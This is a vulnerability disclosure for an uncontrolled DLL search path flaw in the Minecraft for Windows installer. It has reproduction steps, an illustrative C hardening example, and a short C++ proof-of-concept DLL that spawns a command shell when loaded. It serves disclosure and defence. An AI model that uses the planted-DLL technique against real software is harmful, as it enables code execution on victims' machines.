Minecraft for Windows Installer Uncontrolled Search Path Element Remote Code Execution Vulnerability
Summary:
- An uncontrolled search path element occurs while the installer is running and loads a DLL.
- The DLL was loaded by name without first resolving the system directory (GetSystemDirectory was not used), so the loader searched the wrong path, the installer's own directory, before the system directory.
Environment:
- Windows 10 x64
- MinecraftInstaller.exe (version 1.4.7990.2489)
Steps To Reproduce:
1. The target DLL is profapi.dll.
2. Create a profapi.dll containing malicious code in "C:\Users\USER\Downloads" (i.e. "C:\Users\USER\Downloads\profapi.dll"). Because the installer itself is in "C:\Users\USER\Downloads", it searches that directory when loading the DLL.
3. After step 2, the installer and the malicious profapi.dll are in the same directory. Running the installer in this state executes the malicious code in the DLL.
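The summary states that the installer loaded the DLL by name without resolving the system directory first. The C example below is added here for illustration and is not code from the report or from the Minecraft installer. It shows the hardened pattern the report implies: build an absolute System32 path from GetSystemDirectory, load it with LoadLibraryEx restricted by LOAD_LIBRARY_SEARCH_SYSTEM32, and apply the same restriction process-wide with SetDefaultDllDirectories for DLLs the process never loads by name itself. The function names build_system_dll_path, load_system_dll and harden_process_dll_search are this example's own; the Windows-specific parts compile only under _WIN32 so the path logic can be checked on any platform.

```c
#include <stdio.h>
#include <string.h>
#include <stdbool.h>
#ifdef _WIN32
#include <windows.h>
#endif

/* True when name is a bare file name (no directory components or drive),
 * which we require before anchoring it under the system directory.
 * This rejects anything like "..\profapi.dll" or a Downloads path. */
bool is_bare_dll_name(const char *name) {
    if (name == NULL || name[0] == '\0') return false;
    if (strchr(name, '\\') || strchr(name, '/') || strchr(name, ':')) return false;
    if (strcmp(name, ".") == 0 || strcmp(name, "..") == 0) return false;
    return true;
}

/* Build "<sysdir>\<name>" into out. Returns false when name is not bare
 * or the buffer is too small. Portable on purpose so it can be unit-tested. */
bool build_system_dll_path(const char *sysdir, const char *name, char *out, size_t outlen) {
    if (!is_bare_dll_name(name) || sysdir == NULL || out == NULL) return false;
    size_t n = strlen(sysdir);
    bool needs_sep = (n == 0) || (sysdir[n - 1] != '\\');
    int written = snprintf(out, outlen, "%s%s%s", sysdir, needs_sep ? "\\" : "", name);
    return written > 0 && (size_t)written < outlen;
}

/* Wrapper returning a static buffer (NULL when rejected); used by the tests. */
const char *system_dll_path_example(const char *sysdir, const char *name) {
    static char buf[1024];
    return build_system_dll_path(sysdir, name, buf, sizeof buf) ? buf : NULL;
}

#ifdef _WIN32
/* Hardened explicit load: resolve the real system directory, then load the
 * absolute path with the search restricted to System32 so the directory the
 * installer was launched from (e.g. Downloads) is never consulted.
 * Contrast with LoadLibraryA("profapi.dll"), which walks the default order. */
HMODULE load_system_dll(const char *name) {
    char sysdir[MAX_PATH];
    char full[MAX_PATH];
    UINT n = GetSystemDirectoryA(sysdir, MAX_PATH);
    if (n == 0 || n >= MAX_PATH) return NULL;
    if (!build_system_dll_path(sysdir, name, full, sizeof full)) return NULL;
    return LoadLibraryExA(full, NULL, LOAD_LIBRARY_SEARCH_SYSTEM32);
}

/* Process-wide equivalent: call once at start-up so DLLs pulled in by
 * dependencies (not by this code's own LoadLibrary calls) are also resolved
 * from System32 only. Returns FALSE if the API is unavailable. */
BOOL harden_process_dll_search(void) {
    return SetDefaultDllDirectories(LOAD_LIBRARY_SEARCH_SYSTEM32);
}
#endif

int main(void) {
    char full[260];
    /* Constructed sample inputs: a normal system directory and a traversal attempt. */
    if (build_system_dll_path("C:\\Windows\\System32", "profapi.dll", full, sizeof full))
        printf("would load: %s\n", full);
    if (!build_system_dll_path("C:\\Windows\\System32", "..\\profapi.dll", full, sizeof full))
        printf("rejected non-bare DLL name\n");
    return 0;
}
```

The design choice worth noting: an installer usually does not call LoadLibrary on profapi.dll itself; a dependency pulls it in. In that case load_system_dll alone does not help, and harden_process_dll_search, called before anything else loads, is the call that removes the installer's own directory from the search.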
Supporting Material/References:
- Credit: DoHyun Lee (@l33d0hyun) and SeungYun Lee (@SeungYun_Le2) of Korea University Sejong Campus, and JaeHeng Yoon (@onnoveath) of JENBlack Soft
- Software (MinecraftInstaller.exe) download page: https://www.minecraft.net/ko-kr/download
- profapi.dll is the PoC file.
- PoC code (C++, below):
#include <Windows.h>
#include <stdlib.h>

// PoC payload: spawns a command shell to show that the planted DLL ran inside the installer process.
void exploit()
{
    system("cmd");
}

BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
        // Run the payload on its own thread so DllMain returns without doing work under the loader lock.
        CreateThread(0, 0, (LPTHREAD_START_ROUTINE)exploit, 0, 0, 0);
        break;
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}
2021-12-13, 12:00 PM
677711
2.2.8351 (Windows), 2.2.8352 (New Windows App)